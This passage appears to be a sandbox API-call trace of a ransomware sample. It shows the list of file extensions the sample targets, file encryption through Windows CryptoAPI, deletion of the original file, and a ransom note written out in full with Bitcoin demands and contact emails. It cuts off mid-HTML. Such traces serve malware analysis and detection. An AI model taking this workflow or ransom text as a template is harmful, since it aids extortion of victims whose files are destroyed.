f.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp4") returned=".mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0183.341] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.343] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.343] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\_uplqiqusdinydia4xz-.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\_uplqiqusdinydia4xz-.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0183.346] ReadFile (in: hFile=0x390, lpBuffer=0xfde188, nNumberOfBytesToRead=0x909a, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesRead=0x18a640*=0x909a, lpOverlapped=0x0) returned 1
	[0183.349] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.349] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb5d8) returned 1
	[0183.351] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.351] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0183.351] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.352] CryptHashData (hHash=0xfb9230, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0183.352] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.352] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9230, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9670) returned 1
	[0183.352] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.352] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x909a, dwBufLen=0x909a | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x90a0) returned 1
	[0183.353] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.353] RtlMoveMemory (in: Destination=0xfe7230, Source=0xfde188, Length=0x909a | out: Destination=0xfe7230) 
	[0183.353] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.354] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe7230*, pdwDataLen=0x18a1ec*=0x909a, dwBufLen=0x90a0 | out: pbData=0xfe7230*, pdwDataLen=0x18a1ec*=0x90a0) returned 1
	[0183.356] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.356] CryptDestroyKey (hKey=0xfb9670) returned 1
	[0183.356] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.356] CryptDestroyHash (hHash=0xfb9230) returned 1
	[0183.356] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.357] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0183.357] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.358] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.358] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.358] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0183.360] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\_uplqiqusdinydia4xz-.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 114
	[0183.360] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\_uplqiqusdinydia4xz-.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\_uplqiqusdinydia4xz-.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0183.410] WriteFile (in: hFile=0x39c, lpBuffer=0xfe7230*, nNumberOfBytesToWrite=0x90a0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe7230*, lpNumberOfBytesWritten=0x18a648*=0x90a0, lpOverlapped=0x0) returned 1
	[0183.414] CloseHandle (hObject=0x39c) returned 1
	[0183.421] CloseHandle (hObject=0x390) returned 1
	[0183.421] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\_uplqiqusdinydia4xz-.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\_uplqiqusdinydia4xz-.mp4")) returned 1
	[0183.444] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\_uplqiqusdinydia4xz-.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\_uplqiqusdinydia4xz-.mp4")) returned 0
	[0183.444] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c146a90, ftCreationTime.dwHighDateTime=0x1d971ed, ftLastAccessTime.dwLowDateTime=0xd7d58110, ftLastAccessTime.dwHighDateTime=0x1d97264, ftLastWriteTime.dwLowDateTime=0xd7d58110, ftLastWriteTime.dwHighDateTime=0x1d97264, nFileSizeHigh=0x0, nFileSizeLow=0x909a, dwReserved0=0x0, dwReserved1=0x0, cFileName="_uPlQIqUSdinYdiA4XZ-.mp4", cAlternateFileName="_UPLQI~1.MP4")) returned 0
	[0183.445] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0183.454] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0183.454] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ"
	[0183.455] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\*.*"
	[0183.455] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.455] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.455] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\HELP_DECRYPT_YOUR_FILES.TXT") returned 75
	[0183.455] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0183.459] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0183.459] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0183.462] CloseHandle (hObject=0x388) returned 1
	[0183.466] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.466] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.466] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0183.473] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0183.473] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0183.473] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0183.473] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0183.473] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0183.474] CloseHandle (hObject=0x388) returned 1
	[0183.474] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.474] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.474] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0183.474] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\HELP_DECRYPT_YOUR_FILES.HTML") returned 76
	[0183.475] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0183.475] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN 